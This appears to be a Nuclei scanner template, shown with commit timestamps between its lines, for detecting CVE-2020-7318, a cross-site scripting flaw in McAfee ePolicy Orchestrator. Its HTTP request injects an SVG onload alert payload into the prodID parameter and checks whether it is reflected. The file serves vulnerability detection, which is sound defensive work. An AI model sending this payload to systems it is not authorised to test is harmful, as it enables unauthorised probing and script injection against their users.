2021-01-02 04:56:15 +00:00
id : CVE-2020-7318
2020-12-09 08:54:40 +00:00
info :
2022-08-16 14:14:41 +00:00
name : McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
2020-12-09 08:54:40 +00:00
author : dwisiswant0
severity : medium
description : |
2022-08-16 14:14:41 +00:00
McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
2021-08-18 11:29:20 +00:00
reference :
2020-12-09 08:54:40 +00:00
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
2022-05-17 09:18:12 +00:00
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7318
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
2022-08-19 20:55:50 +00:00
reference :
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/merlinepedra/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-7318
cwe-id : CWE-79
2023-11-18 12:52:17 +00:00
epss-score : 0.00065
2024-05-31 19:23:20 +00:00
epss-percentile : 0.28395
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : mcafee
product : epolicy_orchestrator
tags : cve,cve2020,xss,mcafee
2020-12-09 08:54:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-10 22:39:54 +00:00
- raw :
2020-12-09 08:54:40 +00:00
- |
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
2021-01-10 22:39:54 +00:00
Host : {{Hostname}}
2020-12-09 08:54:40 +00:00
Connection : close
2021-01-10 22:39:54 +00:00
2020-12-09 08:54:40 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-09 08:54:40 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
2020-12-09 08:54:40 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-12-09 08:54:40 +00:00
words :
- "Policy Name"
- "'\"><svg/onload=alert(document.domain)>"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100eb60eb2a7ed8164d33e50962d0d82ae90c32969b89bad729bd3f36a4fb228926022100fd28bd5d7df38adc079263e18d7e3460bab67a6f697c8df2237f9765b19576ca:922c64590222798bb761d5b6d8e72950